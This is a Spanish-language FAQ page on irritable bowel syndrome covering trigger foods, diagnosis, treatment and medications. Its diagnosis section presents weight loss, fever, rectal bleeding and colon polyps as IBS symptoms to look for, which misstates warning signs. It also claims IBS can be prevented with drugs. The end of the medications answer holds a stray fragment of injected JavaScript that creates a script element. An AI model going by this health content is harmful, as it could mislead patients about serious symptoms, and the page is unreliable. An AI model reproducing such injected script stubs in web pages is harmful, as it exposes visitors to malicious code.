Salud y belleza » Enfermedades

Preguntas frecuentes sobre el síndrome de colon irritable (II)

Sin Comentarios

¿Qué alimentos pueden causar síntomas de IBS?

Las sustancias que pueden causar síntomas son los alimentos de alto contenido graso (papas fritas),  productos lácteos (queso), chocolate, alcohol, cafeína, refrescos dulces e, incluso, ciertas verduras como el brócoli o el repollo.

¿Todas las personas enfermas reaccionan ante los mismos alimentos?

No, por eso se recomienda que cada persona lleve un registro propio (aún así, por supuesto, existen generalidades). Si ciertos alimentos hacen que los síntomas empeoren repentinamente es necesario anotar éstos datos y comenzar a cambiar los hábitos alimenticios y la dieta.  Un esperto en nutrición puede ayudar actuando a la par de nuestro médico de cabecera.

¿Cómo se diagnostica el Síndrome de colon irritable?

Vale destacar que los estudios de laboratorio y gabinete son negativos así como habitualmente innecesarios: el diagnostico suele ser clínico (suficiente en la mayoría de los casos). Los síntomas a detectar son pérdida de peso, fiebre, sangrado rectal, pólipos de colon y migrañas fuertes. Y, en el caso de que se necesite profundizar en las investigaciones, algo poco común como ya dijimos, los análisis abarcan leucograma completo; velocidad de eritrosedimentación; pruebas de función tiroidea; guayaco en heces; enema opaco o colon por enema; rectosigmoidoscopia; colonoscopia.

¿Existe una cura para tratar el Síndrome de colon irritable?

El Síndrome de colon irritable no tiene cura definitiva. Todos y cada uno de los tratamientos basan sus cimientos en la solución, regular, de aquellos síntomas, dolores y problemas que se desencadenan producto de la enfermedad. Pero, repetimos, ningún tratamiento es definitivo contra el IBS.

¿Qué ocurre si no se trata éste problema?

En el caso de no tomar las medidas necesarios puede ocurrir que el problema acabe transformándose en crónico. Por eso es importante, en primera instancia, prevenir el IBS controlando hábitos y tomando determinados fármacos. Y, en segunda instancia, atendiendo cada uno de los problemas en el momento en el que aparecen. De todos modos, más allá de los dolores, el IBS rara vez implica complicaciones serias y mucho menos fatales.

¿Qué medicamentos se utilizan para tratar el IBS?

Son muchas las alternativas disponibles en el mercado. La variedad implica que existe una medicina para cada uno de los diferentes síntomas que se van presentando. Repasemos alternativas: complementos alimenticios de fibra, laxantes, antiespasmódicos, tranquilizantes, antidepresivos y más.var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.